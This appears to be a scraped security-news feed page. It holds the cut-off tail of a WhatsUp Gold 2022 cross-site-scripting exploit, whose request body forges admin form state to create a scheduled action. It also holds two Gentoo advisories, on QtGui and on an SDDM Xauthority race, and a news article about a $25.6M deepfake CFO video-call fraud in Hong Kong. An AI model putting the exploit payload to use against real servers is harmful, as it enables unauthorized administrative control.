ule.VISITEDFORM=visited&__SOURCEFORM=DlgSchedule&__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-nActionTypeID%2522%2520sValue%3D%2522'+ID+'%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStartOfWeek%2522%2520sValue%3D%25220%2522%2F%253e%253coElement%2520sName%3D%2522Date_sMediumDateFormat%2522%2520sValue%3D%2522MMMM%2520dd%2C%2520yyyy%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24HourTime%2522%2520sValue%3D%25220%2522%2F%253e%253c%2FViewState%253e%0D%0A&DlgSchedule.oEditDay=&DlgSchedule.oComboSelectMonthHour=0&DlgSchedule.oComboSelectMonthMinute=0&DlgSchedule.oComboSelectMonthAmPm=0&DlgSchedule.oComboSelectWeekHour=0&DlgSchedule.oComboSelectWeekMinute=0&DlgSchedule.oComboSelectWeekAmPm=0'});};

WhatsUp Gold 2022 22.1.0 Build 39 Cross Site Scripting

Gentoo Linux Security Advisory 202402-3 - Multiple vulnerabilities have been discovered in QtGui which can lead to remote code execution. Versions greater than or equal to 5.15.9-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: QtGui: Multiple Vulnerabilities  
     Date: February 03, 2024  
     Bugs: #808531, #907119  
       ID: 202402-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in QtGui which can lead to  
remote code execution.

Background  
==========

QtGui is a module for the Qt toolkit.

Affected packages  
=================

Package       Vulnerable    Unaffected  
------------  ------------  ------------  
dev-qt/qtgui  < 5.15.9-r1   >= 5.15.9-r1

Description  
===========

Multiple vulnerabilities have been discovered in QtGui. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All QtGui users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-qt/qtgui-5.15.9-r1"

References  
==========

[ 1 ] CVE-2021-38593  
      https://nvd.nist.gov/vuln/detail/CVE-2021-38593  
[ 2 ] CVE-2023-32763  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32763

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-03

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-03

Gentoo Linux Security Advisory 202402-2 - A vulnerability has been discovered in SDDM which can lead to privilege escalation. Versions greater than or equal to 0.18.1-r6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: SDDM: Privilege Escalation  
     Date: February 03, 2024  
     Bugs: #753104  
       ID: 202402-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in SDDM which can lead to privilege  
escalation.

Background  
==========

SDDM is a modern display manager for X11 and Wayland sessions aiming to  
be fast, simple and beautiful. It uses modern technologies like QtQuick,  
which in turn gives the designer the ability to create smooth, animated  
user interfaces.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
x11-misc/sddm  < 0.18.1-r6   >= 0.18.1-r6

Description  
===========

A vulnerability has been discovered in SDDM. Please review the CVE  
identifier referenced below for details.

Impact  
======

SDDM passes the -auth and -displayfd command line arguments when  
starting the Xserver. It then waits for the display number to be  
received from the Xserver via the `displayfd`, before the Xauthority  
file specified via the `-auth` parameter is actually written. This  
results in a race condition, creating a time window in which no valid  
Xauthority file is existing while the Xserver is already running.

The X.Org server, when encountering a non-existing, empty or  
corrupt/incomplete Xauthority file, will grant any connecting client  
access to the Xorg display. A local unprivileged attacker can thus  
create an unauthorized connection to the Xserver and grab e.g. keyboard  
input events from other legitimate users accessing the Xserver.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All SDDM users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-misc/sddm-0.18.1-r6"

References  
==========

[ 1 ] CVE-2020-28049  
      https://nvd.nist.gov/vuln/detail/CVE-2020-28049

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-02

By Deeba Ahmed
The incident took place in Hong Kong; however, the name of the targeted company is still unknown.
This is a post from HackRead.com Read the original post: Employee Duped by AI-Generated CFO in $25.6M Deepfake Scam

Learn how a multinational company’s Hong Kong branch faced a deepfake scam, causing substantial financial losses, and explore efforts to counter the rising sophistication of deepfake technology.

A multinational company’s Hong Kong branch faced a substantial financial setback due to an advanced deepfake scam. During a video call, an employee was deceived by digitally manipulated versions of the company’s CFO and others, resulting in the unauthorized transfer of funds to the scammers.

The scam recalls the August 2022 incident in which scammers created a Deepfake AI hologram of Patrick Hillmann, Binance’s Chief Communications Officer. The hologram was manipulated to deceive users into participating in online meetings and to target crypto projects of Binance clients.

Reports indicate that the employee was tricked into paying out HK$200 million (approximately US$25.6 million) after participating in a deepfake video call impersonating the company’s CFO. The worker was persuaded after seeing multiple staff members attending that call. However, all were deepfake recreations. 

The worker initially became suspicious after receiving a message from the UK-based CFO and avoided it believing it was a phishing email. However, after a video call, the worker realized that the other attendees resembled his colleagues, despite initial doubts, as they appeared and sounded familiar.

What happened is that the scammers used publicly available footage to create convincing versions of the meeting’s participants, according to Hong Kong police senior superintendent Baron Chan Shun-ching’s briefing on Friday. 

In the digitally altered video, the CFO issued fraudulent instructions to transfer funds to unauthorized accounts. The employee, a finance worker at the company, followed the instructions, leading to a significant financial loss because the scammers had immaculately replicated the CFO’s appearance and voice.

The worker transferred $25 million to five bank accounts in 15 transactions. The scam was discovered after the employee shared the information with the company’s head office. It is worth noting that the incident lasted a week. 

However, this isn’t the first of its kind incident involving deepfake technology. Fraudsters have been relying on this technology to cheat people out of money.

Bitdefender’s latest research reveals a rise in YouTube stream-jacking campaigns using deepfake videos for cryptocurrency theft. Despite McAfee’s MockingBird tool detecting 90% of deepfake content, scammers continue to use malicious techniques for crypto scams, sometimes bypassing facial recognition systems, highlighting ongoing challenges in combating these deceptive practices.

Authorities are investigating the incident in Hong Kong, which is the first such scam involving a large sum of lost money. It has raised concerns about the scammers’ increasing sophistication and potential for financial fraud. Experts urge increased awareness and training for employees to effectively identify and resist these scams.

Hong Kong police confirmed that eight stolen identity cards were used for 90 loan applications and 54 bank account registrations between July and September 2023 using AI deepfakes to trick facial recognition programs on at least 20 occasions. The authorities have so far arrested six individuals in connection with deepfake scams.

1.  **AI Image Editing Tool Cutout Leaked User Images and Data**
2.  **Malicious Abrax666 AI Chatbot Exposed as Potential Scam**
3.  **Dark Web Pedophiles Using Open-Source AI to Generate CSAM**
4.  **Fake LinkedIn Job Offer Used in Stealing $625M from Axie Infinity**
5.  **QR Code Phishing Soars 587%: Users Fall to Social Engineering Scams**

Tag

#mac